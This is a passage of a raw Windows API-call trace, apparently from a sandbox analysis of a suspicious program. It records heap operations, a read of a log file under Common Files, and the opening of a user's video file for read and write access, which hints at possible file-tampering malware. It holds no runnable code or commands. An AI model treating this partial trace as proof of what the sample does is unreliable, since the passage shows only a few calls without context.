wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0192.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0192.471] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0192.471] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.471] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0192.471] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.471] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0192.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0192.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0192.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0192.472] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0192.472] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3414, lpOverlapped=0x0) returned 1 [0192.472] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0192.472] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3414, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.472] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0192.472] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.472] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.472] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.472] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.472] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0192.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0192.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0192.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0192.473] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0192.473] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0192.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0192.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0192.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0192.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0192.497] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0192.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0192.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0192.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0192.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0192.498] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0192.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0192.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0192.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd870 [0192.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0192.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0192.498] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0192.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0192.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0192.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0192.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0192.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0192.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0192.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd870 [0192.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0192.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0192.499] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0192.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0192.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0192.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0192.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0192.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0192.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0192.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0192.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0192.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0192.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0192.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0192.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0192.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3f) returned 0x8db138 [0192.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv", cchWideChar=63, lpMultiByteStr=0x8db138, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv", lpUsedDefaultChar=0x0) returned 63 [0192.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0192.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0192.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0192.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0192.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.500] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ccosswxcev8zf\\7999fjy.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0192.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0192.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0192.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0192.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0192.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0192.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0192.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0192.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0192.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0192.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0192.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0192.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0192.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0192.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=63, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0192.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7e) returned 0x9c0c00 [0192.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=63, lpWideCharStr=0x9c0c00, cchWideChar=63 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.mkv") returned 63 [0192.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0192.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0192.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0192.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0192.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0192.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0192.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0192.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0192.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0192.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0192.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0192.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0192.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0192.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0192.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0192.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0192.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0192.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0192.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0192.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0192.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0192.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0192.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0192.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0192.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0192.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0192.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0192.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0192.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0192.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0192.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0192.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0192.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0192.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0192.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0192.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0192.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0192.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0192.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0192.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0192.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0192.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0192.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0192.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0192.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0192.504] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0192.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0192.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0192.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0192.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0192.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0192.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0192.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0192.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0192.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0192.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0192.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0192.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0192.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0192.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0192.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0192.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0192.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0192.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0192.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0192.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.506] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0192.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0192.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0192.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0192.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0192.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0192.506] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0192.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0192.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0192.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0192.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0192.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0192.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0192.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 